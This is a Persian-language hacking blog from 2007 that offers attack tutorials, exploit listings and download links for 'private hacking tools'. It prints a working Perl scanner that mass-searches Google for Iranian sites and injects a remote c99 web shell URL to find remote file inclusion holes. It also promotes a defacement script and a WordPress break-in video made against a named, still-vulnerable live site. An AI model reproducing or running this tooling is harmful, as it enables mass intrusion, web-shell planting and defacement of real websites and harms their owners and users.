دنياي شبكه و امنيت

فیلم ها ی آموزشی هکینگ

[ نويسنده: VirtualBoY | جمعه سی ام شهریور 1386 | موضوع: ]

اموزش روت کردن : كليپ 5 دقيقه اي در مورد نحوه گرفتن دسترسي root در يك سرويس دهنده لينوكس . اكسپلويت و ابزار مربوط به اين كليپ را از بخش Days Exploit 0
را ميتوانيد از سايتهاي مختلف همچون :
http://milw0rm.com
دريافت كنيد.
http://samiruk.persiangig.com/new_uk_s/r00t.rar

۲- اين هم فيلم آموزشي روت گیری از سرور لینوکس

Downloud Film

{ اينم يسري ابزارهاي هكينگ خصوصي براتون گذاشتم حتما دانلود كنيد . لطفا جايي ديگه پابليك نكنيد DOWNLOAD }

سلام دوستان !!
اینم یه فیم آموزشی عالی برای رووت شدن روی سرور
حتما ببینید خیلی ب درد میخوره !!
اگه مشکلی داشتین با من تماس بگیرین
http://wolfmohajem.persiangig.com/vi...%20hacking.rar

این یه فیلم آموزشی درباره هک کردن سایت هست (روزی 100 سایت )

کار یکی از بچه های خوب هست به نام مهدی !!

http://hacker2005.parsaspace.com/video/findshells.rar

{تجارت الکترونیک : فقط با کلیک کردن}

RFI Scanner

[ نويسنده: VirtualBoY | جمعه سی ام شهریور 1386 | موضوع: ]

سلام

این هم یک RFI Scanner به زبان پرل :

#!/usr/bin/perl
# RFI & LFI Searcher
# C0ded by Night Mare
# Edited By l_l_darkl0rd_l_l
# Search *.iranian web sites
# Mafia Hacking Team
use IO::Socket::INET;
use LWP::Simple;
$txt = "http://www.evilc0der.com/c99.txt";
$search=$ARGV[0];
$search2=$ARGV[1];
$domin=$ARGV[2];
$a=0;
$r=0;
$l=0;
if(!$ARGV[0])
{
	print "\n";
  print "Use:perl $0 \n";
  print "Use:perl $0 index.php? page\n";
  exit;
}
$resul2="";
while ($resul2 !~/more results/) {
if ($a<10) {
    sleep 1;
    $sock = IO::Socket::INET->new(PeerAddr => "www.google.com", PeerPort => 80, Proto => "tcp")or next;
    print $sock "GET /search?lr=lang_fa&cr=&q=allinurl:/$search.$search2start=$a HTTP/1.0\r\n";
    print $sock "Content-type: text/html\n\n";
    print $sock "Host: www.google.com\r\n\r\n";
    @resul=<$sock>;
    $resul2="@resul";
    close($sock);
    sleep 1;
} else {
	sleep 1;
    $sock = IO::Socket::INET->new(PeerAddr => "www.google.com", PeerPort => 80, Proto => "tcp")or next;
    print $sock "GET /search?lr=lang_fa&cr=&q=allinurl:/$search.$search2&start=$a HTTP/1.0\r\n";
    print $sock "Content-type: text/html\n\n";
    print $sock "Host: www.google.com\r\n\r\n";
    @resul=<$sock>;
    $resul2="@resul";
    close($sock);
    sleep 1;
    }
print "\n";
while($resul2 =~ m//) {
	$resul2 =~ s//$1/;
	($p,$path) = split($search,$1);
	($h,$http) = split("http://",$p);
	($h2,$http2) = split($search2,$http);
	$kol =$h2.$search.$search2."=".$txt;
	$start = get("http://".$kol);
	if($start) {
	if ($start =~ m/Defacing/ms)
    {
 		 print "\n[*] RFI Vuln: $http \n";
  	     open(rfi,">>rfi.txt");
  		 print rfi $h2.$search.$search2."=\n";
  		 $r++;
  		 close(rfi);
  	} else {
  	  print "\n[*] RFI UnVuln: $http \n";
  }
  if ($start =~ m/Warning/ms) {
  	  print "\n[*] Warning Error: $http \n";
	  open(lfi,">>lfi.txt");
  	  print lfi $h2.$search.$search2."=\n";
  	  close(lfi);
  	  $l++;
  } else {
  	  print "\n[*] Unvuln: $http \n";
  	  }
  	  if($start =~ m/In order to show you the most relevant results,/ms) 
  	  { 
  	  print "\n[*] END. Total RFI : $r\n Total LFI : $l++\n"; 
  	  exit; 
  	  }
   $a ++;
} else {
	print "\n[*] Unreachable : $http \n";
	}
}
}
#All rights reserved by CSD (Cyber security department)

__________________

آخرین باگ های کشف شده

[ نويسنده: VirtualBoY | چهارشنبه بیست و هشتم شهریور 1386 | موضوع: ]

با سلام

سایت http://www.milw0rm.com/ روزانه آخرین باگ های امنیتی را اعلام می کند که می توانید از آن ها استفاده کنید ضمنا این سایت فیلم های آموزشی هم دارد که امروز براتون قرار می دهم .

2007-09-19 Mercury/32 4.52 IMAPD SEARCH command Post-Auth Overflow Exploit 425 R D void

2007-09-19 Yahoo! Messenger 8.1.0.421 CYFT Object Arbitrary File Download 610 R D X shinnai

2007-09-19 jetAudio 7.x ActiveX DownloadFromMusicStore() Code Execution Exploit 810 R D X h07

2007-09-18 Apple Quicktime /w IE .qtl Version XAS Remote Exploit PoC 1189 R D X Aviv Raff

2007-09-18 MW6 Technologies QRCode ActiveX 3.0 Remote File Overwrite Exploit 917 R D X shinnai

2007-09-12
Apple Quicktime (Multiple Browsers) Command Execution PoC (0day)

فیلم های سایت :

2007-06-18 Exploiting SW Vulnerabilities 26339 skillTube

2007-06-15 Patching KeyGenMe with OllyDbg 12503 FBi

2007-06-12 Find, Exploit & Cure XSS w0rms 18391 n/a

2007-05-23 Rooting SQL Server via SQL Injection 36348 gsy

2007-05-14 Classical Basic Local Buffer Overflow 15689 UniquE-Key

2007-05-14 The dangers of Ad-Hoc networks in Windows XP SP2 20427 rel1k
7029 R D X pdp

فیلم های فارسی آموزش هک

[ نويسنده: VirtualBoY | یکشنبه بیست و پنجم شهریور 1386 | موضوع: ]

این یک فیلم حدود 50 دقیقه هست که از طریق کلاینت هکینگ دوستمون وارد یک سیستم میشه دیدنش خالی از لطف نیست
http://shadowes.persiangig.com/video/client.rar

این هم فیلم اسنیف کردن یک شبکه و استخراج پسورد ادمین شبکه با نرم افزار cain

http://shadowes.persiangig.com/video/cain.rar

یک فیلم کلاینت هکینگ با متد کاملا نوین و بدون استفاده از تروجان و با ترکیب دو برنامه interlaced و nc
http://shadowes.persiangig.com/video/interlaced.rar

فیلم سرور هکینگ با استفاده از برنامه local file inclusion (lfi) و با استفاده از برنامه brutus

http://shadowes.persiangig.com/video/passwd.rar

نفوذ و روت گرفتن از سرور با استفاده از ip invalid و انتقال شل توسط nc

http://shadowes.persiangig.com/video/rele.rar

فیلم دکود کردن پسورد و نفوذ به ftp با استفاده از باگ موجود در ws_ftp

http://shadowes.persiangig.com/video/ws-ftp.rar

روش نوین برای استفاده از باگ های xss

http://shadowes.persiangig.com/video/xss.rar

استخراج و کرک پسورد lm و ntlm هش از داخل dos

http://papet.persiangig.com/video/SAM_CRACK.RAR

فیلم آموزشی نصب لینوکس نسخه ubuntu linux

http://papet.persiangig.com/video/Ubuntu-install.rar

فیلم آموزشی باز کردن پورت و روت کردن سرور با استفاده از باگ quarze.pl لازم به ذکر است سال گذشته با همین باگ سایت unesco هم دیفیس شد توسط تیم امنیتی ویرانگر

http://papet.persiangig.com/video/cgi-bug.rar

فیلم آموزشی تقریبا کامل نحوه پیدا کردن باگ های rfi و نحوه تست cms ها از طریق لوکال و اکسپلویت کردن و مهمتر از همه چیز نحوه پچ کردن باگ هست

http://papet.persiangig.com/video/rfi.rar

فیلم آموزشی پیدا کردن باگ های sql در سایت و اکسپلویت کردن آنها و در نهایت استخراج پسورد ادمین با استفاده از inject کرن و نفوذ به سرور با استفاده از اسکنر

http://www.parsaspace.com/satan/shadowes/sql-xss.rar

با تشکر از jaber (in) simorgh security

Safe Mode by pass &automatic Defacer

[ نويسنده: VirtualBoY | دوشنبه نوزدهم شهریور 1386 | موضوع: ]

Saturday, 10 March 2007

By Dr.Trojan
امروزه شايد خطرناك ترين حمله عليه سرورها با سيستم عامل هاي (Open Source) مانند لينوكس ويونيكس حملاتي با نام By Pass هست كه هكر با استفاده ضعف هاي Permision بندي به سرور حمله مينمايد.اين اسكريپت كه به زبان قدرتمند Php توسط اينجانب(فرزاد شريفي) نوشته شده است با دارا بودن تمامي كامند هاي مربوطه به By Pass به هكر اين امكان را ميدهد كه تنها با چند كليك دسترسي خود را بالا برده ومجوز بندي ساده و ضعيف(كه اكثر سرورها به ان مبتلا هستند)را در هم شكند

| ادامه مطلب

آموزش تصویری نفوذ به کنترل پنل Wordpress 1.5

[ نويسنده: VirtualBoY | پنجشنبه یکم شهریور 1386 | موضوع: ]

سلام

همانطور که قبلا گفته بودم این آموزش تصویری که براتون آماده کردم را براتون می ذارم ، من در فیلم به یک سایت ایرانی (www.hichkas.com) حمله کردم ، سایت فوق هنوز به روز نکرده و دارای مشکل هست لطفا به سایت آسیب نرسانید .

با تشکر مدیر تیم

دریافت فایل : هک wordpress

irhacking2

VirtualBoY

irhacking2

http://irhacking2.blogfa.com

دنياي شبكه و امنيت

دنياي شبكه و امنيت

دنياي شبكه و امنيت

دنياي شبكه و امنيت

قالب وبلاگ

free Template Blog

قالب پرشين بلاگ

قالب بلاگفا